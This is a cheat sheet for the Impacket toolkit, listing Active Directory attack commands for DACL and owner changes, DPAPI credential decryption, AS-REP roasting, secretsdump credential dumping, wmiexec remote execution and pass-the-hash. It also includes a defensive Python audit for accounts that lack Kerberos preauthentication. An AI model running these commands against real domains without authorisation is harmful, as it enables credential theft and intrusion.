Impacket - CheatSheet

 

1.0 Installation

2.0 Configuration

3.0 Usage

3.1 impacket-dacledit

Modify the DACL of a group

impacket-dacledit -action 'write' -rights 'WriteMembers' -principal 'UserToModify' -target-dn 'CN=GROUPNAME,CN=USERS,DC=DOMAIN,DC=LOCAL' 'domain.local/user:pass'

3.2 impacket-dpapi

Decrypt DPAPI secrets

PS %appdata%\Roaming\Microsoft\Credentials\> dir -h
download C4BB96844A5C9DD45D5B6A9859252BA6
PS %appdata%\Roaming\Microsoft\Protect\[sid]> dir -h
download 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b
impacket-dpapi masterkey -file 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b -sid [sid] -password $pass
-> 0xlongkey
impacket-dpapi credential -file C4BB96844A5C9DD45D5B6A9859252BA6 -key 0xlongkey

3.3 impacket-GetNPUsers

Get users with the "Do not require Kerberos preauthentication" flag set

impacket-GetNPUsers -dc-ip $dcip -request -usersfile users domain.local/

3.4 impacket-getTGT

Request a TGT

impacket-getTGT 'domain.local/user:pass'

3.5 impacket-owneredit

Change the current owner of a group

impacket-owneredit -action 'write' -new-owner 'UserToSet' -target 'Groupname' 'domain.local/user:pass'

3.6 impacket-secretsdump

Local

impacket-secretsdump -sam sam -system system LOCAL

Remote

impacket-secretsdump 'domain.local/admin:pass@DC01'

3.7 impacket-smbclient

impacket-smbclient 'domain.local/user:pass@DC01'

3.8 impacket-wmiexec

impacket-wmiexec "@$dc.$domain.local" -k -no-pass -debug
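
Defender's note on the impacket-GetNPUsers entry above: the accounts it reports are those whose userAccountControl has the DONT_REQ_PREAUTH bit (0x400000) set. The following added example (not part of the original cheat sheet) audits a directory export for that bit so it can be cleared where it is not needed; the LDIF sample and the function names are constructed for illustration.

```python
# Constructed LDIF sample (shape of an ldapsearch export); not real data.
SAMPLE_LDIF = """\
dn: CN=alice,CN=Users,DC=domain,DC=local
sAMAccountName: alice
userAccountControl: 512

dn: CN=svc_backup,CN=Users,DC=domain,DC=local
sAMAccountName: svc_backup
userAccountControl: 4260352

dn: CN=old_kiosk,CN=Users,DC=domain,DC=local
sAMAccountName: old_kiosk
userAccountControl: 4194818
"""

# userAccountControl bits as documented by Microsoft
UF_ACCOUNTDISABLE = 0x0002
UF_DONT_REQUIRE_PREAUTH = 0x400000


def parse_ldif(text):
    """Split an LDIF export into one attribute dict per entry."""
    entries = []
    for block in text.strip().split("\n\n"):
        entry = {}
        for line in block.splitlines():
            if line.startswith("#") or ": " not in line:
                continue  # skip comments and lines without "attr: value"
            key, value = line.split(": ", 1)
            entry[key] = value.strip()
        if entry:
            entries.append(entry)
    return entries


def accounts_without_preauth(entries):
    """Return (name, enabled) for each account with DONT_REQ_PREAUTH set."""
    findings = []
    for e in entries:
        try:
            uac = int(e["userAccountControl"])
        except (KeyError, ValueError):
            continue  # not a user entry, or a malformed value
        if uac & UF_DONT_REQUIRE_PREAUTH:
            name = e.get("sAMAccountName", e.get("dn", "?"))
            findings.append((name, not (uac & UF_ACCOUNTDISABLE)))
    return findings


if __name__ == "__main__":
    for name, enabled in accounts_without_preauth(parse_ldif(SAMPLE_LDIF)):
        print(f"{name}: preauth not required, {'enabled' if enabled else 'disabled'}")
```

Enabled accounts in the result are the ones to remediate first; the same set can be selected server-side with the LDAP filter `(userAccountControl:1.2.840.113556.1.4.803:=4194304)`.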

4.0 Hints

4.1 Debug

If you encounter any errors during execution, try the -debug switch.

4.2 Authentication

You can use different authentication types:

  • User / Password:

      `domain.local/user:pass`
    
  • User / Hash:

      `-hashes :2a3de7fe356ee524cc9f3d579f2e0aa7 'domain.local/user'`
      
    
  • Kerberos Cache:

      `-k -no-pass`
    

5.0 References

CheatSheet Kali